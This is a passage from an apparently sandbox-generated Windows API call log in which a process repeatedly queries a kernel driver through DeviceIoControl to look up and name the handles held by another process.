DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800379a920, HandleInformation=0x0) returned 0x0 [0137.893] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.893] PsReleaseProcessExitSynchronization () returned 0x2 [0137.893] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.893] ObQueryNameString (in: Object=0xfffffa800379a920, ObjectNameInfo=0xfffffa8002f0f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f0f044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.894] ObfDereferenceObject (Object=0xfffffa800379a920) returned 0x2 [0137.894] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.894] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.894] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.894] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.894] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.894] PsAcquireProcessExitSynchronization () returned 0x0 [0137.894] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.894] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800380d9a0, HandleInformation=0x0) returned 0x0 [0137.894] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.895] PsReleaseProcessExitSynchronization () returned 0x2 [0137.895] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.895] ObQueryNameString (in: Object=0xfffffa800380d9a0, ObjectNameInfo=0xfffffa8002ed6044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ed6044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.895] ObfDereferenceObject (Object=0xfffffa800380d9a0) returned 0x2 [0137.895] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.895] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.895] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.895] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0137.895] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.895] PsAcquireProcessExitSynchronization () returned 0x0 [0137.895] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.896] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800380fe10, HandleInformation=0x0) returned 0x0 [0137.896] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.896] PsReleaseProcessExitSynchronization () returned 0x2 [0137.896] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.896] ObQueryNameString (in: Object=0xfffffa800380fe10, ObjectNameInfo=0xfffffa8002f13044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f13044, ReturnLength=0xfffff88005163550) returned 0x0 [0137.896] ObfDereferenceObject (Object=0xfffffa800380fe10) returned 0x2 [0137.896] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.896] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.896] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.896] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0137.896] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.897] PsAcquireProcessExitSynchronization () returned 0x0 [0137.897] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.897] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003815d20, HandleInformation=0x0) returned 0x0 [0137.897] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.897] PsReleaseProcessExitSynchronization () returned 0x2 [0137.897] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.897] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f26044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f26044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.897] ObfDereferenceObject (Object=0xfffffa8003815d20) returned 0x20 [0137.897] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.897] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.897] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.897] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0137.898] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.898] PsAcquireProcessExitSynchronization () returned 0x0 [0137.898] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.898] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003816ea0, HandleInformation=0x0) returned 0x0 [0137.898] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.898] PsReleaseProcessExitSynchronization () returned 0x2 [0137.898] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.898] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f25044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f25044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.898] ObfDereferenceObject (Object=0xfffffa8003816ea0) returned 0x12 [0137.898] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.898] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.899] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.899] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xa0, lpOverlapped=0x0) returned 1 [0137.899] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.899] PsAcquireProcessExitSynchronization () returned 0x0 [0137.899] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.899] ObReferenceObjectByHandle (in: Handle=0x1dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800381af20, HandleInformation=0x0) returned 0x0 [0137.899] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.899] PsReleaseProcessExitSynchronization () returned 0x2 [0137.899] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.899] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f22044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f22044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.899] ObfDereferenceObject (Object=0xfffffa800381af20) returned 0x12 [0137.900] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.900] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.900] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.900] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0137.900] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.900] PsAcquireProcessExitSynchronization () returned 0x0 [0137.900] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.900] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003819910, HandleInformation=0x0) returned 0x0 [0137.900] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.900] PsReleaseProcessExitSynchronization () returned 0x2 [0137.900] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0137.901] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f20044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f20044, ReturnLength=0xfffff88005163508) returned 0x0 [0137.901] ObfDereferenceObject (Object=0xfffffa8003819910) returned 0x12 [0137.901] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0137.901] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0137.901] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0137.901] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0137.901] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0137.901] PsAcquireProcessExitSynchronization () returned 0x0 [0137.901] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0137.901] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003815a70, HandleInformation=0x0) returned 0x0 [0137.901] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0137.901] PsReleaseProcessExitSynchronization () returned 0x2 [0137.902] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.173] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f1b044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f1b044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.174] ObfDereferenceObject (Object=0xfffffa8003815a70) returned 0x12 [0139.174] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.174] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.174] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.174] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0139.174] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.174] PsAcquireProcessExitSynchronization () returned 0x0 [0139.174] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.174] ObReferenceObjectByHandle (in: Handle=0x214, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800381c9c0, HandleInformation=0x0) returned 0x0 [0139.174] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.174] PsReleaseProcessExitSynchronization () returned 0x2 [0139.175] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.175] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800290d484, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800290d484, ReturnLength=0xfffff88005163508) returned 0x0 [0139.175] ObfDereferenceObject (Object=0xfffffa800381c9c0) returned 0x12 [0139.175] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.175] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.175] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.175] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x96, lpOverlapped=0x0) returned 1 [0139.175] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.175] PsAcquireProcessExitSynchronization () returned 0x0 [0139.175] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.175] ObReferenceObjectByHandle (in: Handle=0x218, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800381cd10, HandleInformation=0x0) returned 0x0 [0139.175] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.175] PsReleaseProcessExitSynchronization () returned 0x2 [0139.175] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.175] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ee8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ee8044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.175] ObfDereferenceObject (Object=0xfffffa800381cd10) returned 0x12 [0139.176] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.176] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.176] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.176] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xaa, lpOverlapped=0x0) returned 1 [0139.176] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.176] PsAcquireProcessExitSynchronization () returned 0x0 [0139.176] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.176] ObReferenceObjectByHandle (in: Handle=0x21c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800abfcbe0, HandleInformation=0x0) returned 0x0 [0139.176] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.176] PsReleaseProcessExitSynchronization () returned 0x2 [0139.176] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.176] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ef0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ef0044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.176] ObfDereferenceObject (Object=0xfffffa800abfcbe0) returned 0x12 [0139.176] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.176] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.177] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.177] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x9a, lpOverlapped=0x0) returned 1 [0139.177] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.177] PsAcquireProcessExitSynchronization () returned 0x0 [0139.177] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.177] ObReferenceObjectByHandle (in: Handle=0x224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800381ddc0, HandleInformation=0x0) returned 0x0 [0139.177] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.177] PsReleaseProcessExitSynchronization () returned 0x2 [0139.177] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.177] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ef1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ef1044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.177] ObfDereferenceObject (Object=0xfffffa800381ddc0) returned 0x12 [0139.177] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.177] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.177] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.177] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xc8, lpOverlapped=0x0) returned 1 [0139.178] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.178] PsAcquireProcessExitSynchronization () returned 0x0 [0139.178] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.178] ObReferenceObjectByHandle (in: Handle=0x228, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003820910, HandleInformation=0x0) returned 0x0 [0139.178] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.178] PsReleaseProcessExitSynchronization () returned 0x2 [0139.178] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.178] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ef2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ef2044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.178] ObfDereferenceObject (Object=0xfffffa8003820910) returned 0x12 [0139.178] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.178] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.178] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.178] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xd2, lpOverlapped=0x0) returned 1 [0139.179] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.179] PsAcquireProcessExitSynchronization () returned 0x0 [0139.179] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.179] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800a783a30, HandleInformation=0x0) returned 0x0 [0139.179] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.179] PsReleaseProcessExitSynchronization () returned 0x2 [0139.179] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.179] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002ef3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002ef3044, ReturnLength=0xfffff88005163508) returned 0x0 [0139.179] ObfDereferenceObject (Object=0xfffffa800a783a30) returned 0x12 [0139.179] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.179] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.179] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.179] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0139.179] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.179] PsAcquireProcessExitSynchronization () returned 0x0 [0139.180] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.180] ObReferenceObjectByHandle (in: Handle=0x294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0139.180] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.180] PsReleaseProcessExitSynchronization () returned 0x2 [0139.180] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.180] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f75044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f75044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.180] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0139.180] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.180] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0139.180] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0139.180] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0139.180] PsLookupProcessByProcessId (in: ProcessId=0x2c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0139.180] PsAcquireProcessExitSynchronization () returned 0x0 [0139.180] KeStackAttachProcess (in: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003762b30, ApcState=0xfffff880051635d0) [0139.181] ObReferenceObjectByHandle (in: Handle=0x29c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0139.181] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0139.181] PsReleaseProcessExitSynchronization () returned 0x2 [0139.181] ObfDereferenceObject (Object=0xfffffa8003762b30) returned 0xbd [0139.181] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8002f7a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f7a044, ReturnLength=0xfffff88005163550) returned 0x0 [0139.181] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x27 [0139.181] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0139.181] HeapFree (in: hHeap=0x290000, 